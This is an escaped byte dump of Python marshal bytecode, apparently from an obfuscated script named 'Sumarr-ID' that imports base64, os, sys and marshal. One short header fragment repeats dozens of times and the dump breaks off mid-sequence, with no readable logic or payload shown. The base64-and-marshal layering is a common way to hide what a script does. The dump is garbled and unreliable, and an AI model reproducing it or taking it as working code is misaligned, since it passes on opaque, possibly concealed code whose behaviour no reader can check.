0\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\